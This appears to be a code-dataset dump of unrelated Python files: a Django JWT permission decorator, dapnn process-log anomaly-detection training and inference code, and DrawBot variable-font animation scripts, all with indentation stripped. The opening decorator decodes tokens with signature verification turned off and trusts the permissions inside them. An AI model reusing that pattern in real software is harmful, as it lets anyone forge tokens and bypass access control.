audience=os.environ.get("JWT_AUDIENCE", ""),
issuer=os.environ.get("JWT_ISSUER", ""),
algorithms=[os.environ.get("JWT_ALGORITHM", "RS256")],
)
def jwt_get_username_from_payload_handler(payload):
username = payload["sub"].replace("|", ".")
authenticate(remote_user=username)
return username
def get_token_auth_header(request):
"""Obtains the Access Token from the Authorization Header"""
auth = request.META.get("HTTP_AUTHORIZATION")
if not auth:
return None
parts = auth.split()
token = parts[1]
return token
def requires_permission(required_permission):
"""Determines if the required permission is present in the Access Token
Args:
required_permission (str): The permission required to access the resource
"""
def require_permission(f):
@wraps(f)
def decorated(*args, **kwargs):
token = get_token_auth_header(args[0])
if token:
decoded = jwt.decode(token, verify=False)
permissions = decoded.get("permissions")
if permissions:
for permission in permissions:
if permission == required_permission:
return f(*args, **kwargs)
response = JsonResponse({"message": "You don't have access to this resource"})
response.status_code = 403
return response
return decorated
return require_permission
``` |
{
"source": "joLahann/dapnn",
"score": 2
} |
#### File: dapnn/dapnn/performance.py
```python
__all__ = ['load_pred_model', 'inference']
# Cell
from .imports import *
from .data_processing import *
from .anomaly import *
# Cell
import warnings
warnings.filterwarnings(action='once')
# Cell
def load_pred_model(learner_path,train_log_path,log_name,cols=['activity']):
log = import_log(train_log_path)
o,dls,categorify = training_dl(log,cat_names=cols)
loss=partial(multi_loss_sum,o)
emb_szs = get_emb_sz(o)
m=MultivariateModel(emb_szs)
learn=Learner(dls, m, path=learner_path, model_dir='.', loss_func=loss, metrics=get_metrics(o))
learn.load(log_name,with_opt=False)
m=learn.model.cuda()
return m, categorify
def inference(test_log_path,m,categorify,log_name,cols=['activity'],fixed_threshold=None,override_threshold_func=None):
if type(test_log_path)==str:
log = import_log(test_log_path)
else:
log = test_log_path
o = process_test(log,categorify,cols)
nsp,idx=predict_next_step(o,m)
score_df=multivariate_anomaly_score(nsp,o,idx,cols)
y_true,y_pred=multivariate_anomalies(score_df,cols,idx,o,fixed_threshold=fixed_threshold)
if override_threshold_func is not None:
y_true,y_pred=multivariate_anomalies(score_df,cols,idx,o,get_thresholds=override_threshold_func)
else:
y_true,y_pred=multivariate_anomalies(score_df,cols,idx,o,fixed_threshold=fixed_threshold)
f1_score(y_true, y_pred)
nsp_acc= float(nsp_accuracy(o,idx,nsp[0]))
f1 = f1_score(y_true, y_pred)
acc = accuracy_score(y_true, y_pred)
precision = precision_score(y_true,y_pred)
recall = recall_score(y_true,y_pred)
return [log_name, nsp_acc, f1, acc, precision, recall]
```
#### File: dapnn/dapnn/training.py
```python
__all__ = ['train', 'train_pdc20_logs', 'train_pdc21_logs', 'train_binet_logs', 'run_training']
# Cell
from .imports import *
from .data_processing import *
from .anomaly import *
# Cell
import warnings
warnings.filterwarnings(action='once')
# Cell
import fire
# Cell
def train(fn,log_name,store_path='models',epoch=25,ws=5):
cols= get_attr(attr_dict,fn)
log = import_log(fn,cols)
o,dls,categorify = training_dl(log,cols,ws=ws)
p = f'{store_path}/{log_name}_vocab.p'
with open(p, "wb") as output_file:
pickle.dump(categorify, output_file)
emb_szs = get_emb_sz(o)
m=MultivariateModel(emb_szs)
loss=partial(multi_loss_sum,o)
train_val = train_validate(dls,m,loss=loss,metrics=get_metrics(o),epoch=epoch,show_plot=False,print_output=False,store_path=store_path,model_name=log_name)
# Cell
def train_pdc20_logs():
store_path='models/pdc2020'
for training_log in progress_bar(glob.glob('data/csv/PDC2020_training/*')):
log_name = training_log.split('.')[0].split('_')[-1]
train(training_log,log_name,store_path=store_path)
# Cell
def train_pdc21_logs():
store_path='models/pdc2021'
for training_log in progress_bar(glob.glob('data/csv/PDC2021_training/*')):
log_name = training_log.split('.')[0].split('_')[-1]
train(training_log,log_name,store_path=store_path)
# Cell
def train_binet_logs():
store_path='models/binet_logs'
for training_log in progress_bar(glob.glob('data/csv/binet_logs/*')):
log_name = training_log.split('/')[-1][:-7]
train(training_log,log_name,store_path=store_path)
# Cell
def run_training(log="binet"):
if log == 'binet':
train_binet_logs()
elif log == 'pdc20':
train_pdc20_logs()
elif log == 'pdc21':
train_pdc21_logs()
elif log == 'all':
train_pdc20_logs()
train_pdc21_logs()
train_binet_logs()
else:
raise ValueError(f'{log} is not a supported data set!')
``` |
{
"source": "jolancornevin/loving_algorithm",
"score": 2
} |
#### File: loving_algorithm/daily_challenges/daily_template.py
```python
def main():
print "Starting script"
# Insert code here
print "Success !"
if __name__ == "__main__":
main()
``` |
{
"source": "jo-lang/traversing_designspaces",
"score": 2
} |
#### File: traversing_designspaces/2axes_code/area_diff_curves.py
```python
import sys
sys.path.append("..")
from helper_functions import *
# --------------------------
# settings
p_w, p_h = 500, 500
margin = 30
dia = 4
steps = 40
txt = 'vfonts'
f_name = 'Skia-Regular'
axes = ['wght', 'wdth']
axis1_min = listFontVariations(f_name)[axes[0]]['minValue']
axis1_max = listFontVariations(f_name)[axes[0]]['maxValue']
axis2_min = listFontVariations(f_name)[axes[1]]['minValue']
axis2_max = listFontVariations(f_name)[axes[1]]['maxValue']
axis_w = p_w - 2 * margin
axis_h = p_h - 2 * margin
# --------------------------
# functions
def a_page():
'''Make a base page with the designspace in the background'''
newPage(p_w,p_h)
fill(1)
rect(0, 0, p_w, p_h)
translate(margin, margin)
fill(.75)
rect(0, 0, axis_w, axis_h)
fill(0)
oval(-dia/2, -dia/2, dia, dia)
oval(-dia/2 + axis_w, -dia/2, dia, dia)
oval(-dia/2, -dia/2 + axis_h, dia, dia)
oval(-dia/2 + axis_w, -dia/2 + axis_h, dia, dia)
fontSize(32)
font(f_name)
var_values = { axes[0] : axis1_min, axes[1] : axis2_min }
fontVariations( **var_values )
text('a', (0, -20), align ='center')
var_values = { axes[0] : axis1_max, axes[1] : axis2_min }
fontVariations( **var_values )
text('a', (axis_w, -20), align ='center')
var_values = { axes[0] : axis1_min, axes[1] : axis2_max }
fontVariations( **var_values )
text('a', (0, axis_h + 8),align ='center')
var_values = { axes[0] : axis1_max, axes[1] : axis2_max }
fontVariations( **var_values )
text('a', (axis_w, axis_h + 8),align ='center')
fontSize(120)
# --------------------------
# Drawings
pts = []
for st in range(steps+1):
a_page()
factor = st/steps
x = ip(axis1_min, axis1_max, factor)
y = lucas(axis2_min, axis2_max, st, (steps+1))
pts.append((factor * axis_w, map_val(y, axis2_min, axis2_max, 0, axis_h)))
for px, py in pts:
fill(1, 0, 0)
oval(px - dia/2, py - dia/2, dia, dia)
fill(0, .9)
var_values = { axes[0] : x, axes[1] : y }
fontVariations(**var_values)
text(txt, (axis_w/2, axis_h/2), align = 'center')
# saveImage('../imgs/%.3d.png' % st)
```
#### File: traversing_designspaces/2axes_code/area_mintomax.py
```python
import sys
sys.path.append("..")
from helper_functions import *
# --------------------------
# settings
p_w, p_h = 300, 300
margin = 30
dia = 4
steps = 40
txt = 'vfonts'
f_name = 'Skia-Regular'
axis_w = p_w - 2 * margin
axis_h = p_h - 2 * margin
axes = ['wght', 'wdth']
# --------
axis1_min = listFontVariations(f_name)[axes[0]]['minValue']
axis1_def = listFontVariations(f_name)[axes[0]]['defaultValue']
axis1_max = listFontVariations(f_name)[axes[0]]['maxValue']
axis2_min = listFontVariations(f_name)[axes[1]]['minValue']
axis2_def = listFontVariations(f_name)[axes[1]]['defaultValue']
axis2_max = listFontVariations(f_name)[axes[1]]['maxValue']
# --------------------------
# functions
def a_page():
newPage(p_w,p_h)
translate(margin, margin)
fill(.75)
rect(0, 0, axis_w, axis_h)
fill(0)
oval(-dia/2, -dia/2, dia, dia)
oval(-dia/2 + axis_w, -dia/2, dia, dia)
oval(-dia/2, -dia/2 + axis_h, dia, dia)
oval(-dia/2 + axis_w, -dia/2 + axis_h, dia, dia)
text('min|min', (0, -12), align ='center')
text('max|min', (axis_w, -12), align ='center')
text('min|max', (0, axis_h + 8),align ='center')
text('max|max', (axis_w, axis_h + 8),align ='center')
font(f_name)
fontSize(80)
# --------------------------
# Drawings
pts = []
for st in range(steps):
a_page()
factor = st/steps
x = ip(axis1_min, axis1_max, factor)
y = ip(axis2_min, axis2_max, factor)
pts.append((factor * axis_w, factor * axis_h))
for px, py in pts:
fill(1, 0, 0)
oval(px - dia/2, py - dia/2, dia, dia)
fill(0, .8)
var_values = { axes[0] : x, axes[1] : y }
fontVariations(**var_values)
text(txt, (axis_w/2, axis_h/2), align = 'center')
```
#### File: traversing_designspaces/6axes_code/sliders_sinus_varA_6axes.py
```python
import sys
sys.path.append("..")
from helper_functions import *
# --------------------------
# settings
pw = ph = 500
axis_l = 420
dot_s = 10
steps = 60
margin = (pw - axis_l)/2
font_name = '../fonts/varA.ttf'
selected_axes = [ 'ANLE', 'ANRI', 'WELE', 'WERI', 'WECE', 'HECE' ]
axes = { axis : listFontVariations(font_name)[axis] for axis in selected_axes }
angle = pi/len(axes)
cols = [
(22/255, 96/255, 168/255, .75),
(1, 106/255, 0, .75),
(34/255, 149/255, 26/255, .75),
(205/255, 12/255, 25/255, .75),
(129/255, 76/255, 177/255, .75),
(122/255, 67/255, 57/255, .75)
]
# ------------------------------------
# functions
def base_chart(axes, l, web = False):
for a, axis in enumerate(axes):
fill(None)
strokeWidth(.5)
stroke( * cols[a])
y = a * l/(len(axes)-1)
line( (0, y), (axis_l, y))
stroke(None)
fill(0)
text('%.3f' % axes[axis]['minValue'], (0, y + dot_s/2))
text('%.3f' % axes[axis]['maxValue'], (axis_l, y + dot_s/2), align ='right')
text('%s' % axes[axis]['name'], (0, y - dot_s))
def base_page():
newPage(pw, ph)
fill(1)
rect(0, 0, pw, ph)
translate(margin, margin)
base_chart(axes, axis_l)
stroke(None)
fill(0)
# ------------------------------------
# drawings
all_polys = []
for st in range(steps):
# newDrawing()
base_page()
factor = st / steps
vals = []
for a, axis in enumerate(axes):
x = axis_l/2 + cos(pi*2 * factor + a * pi/len(axes)) * axis_l/2
fill( *cols[a] )
vals.append(x)
oval(x - dot_s/2, a * (axis_l/(len(axes)-1))- dot_s/2, dot_s, dot_s)
var_values = { axis : map_val(vals[a], 0, axis_l, axes[axis]['minValue'], axes[axis]['maxValue']) for a, axis in enumerate(axes) }
fontVariations(**var_values)
fill(0, .05)
fill(None)
stroke(0, .25)
strokeWidth(1)
font(font_name)
fontSize(pw/4)
fill(0)
stroke(None)
text('A', (pw/3, ph/3))
# saveImage('~/Desktop/imgs/%.3d.png' % st)
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.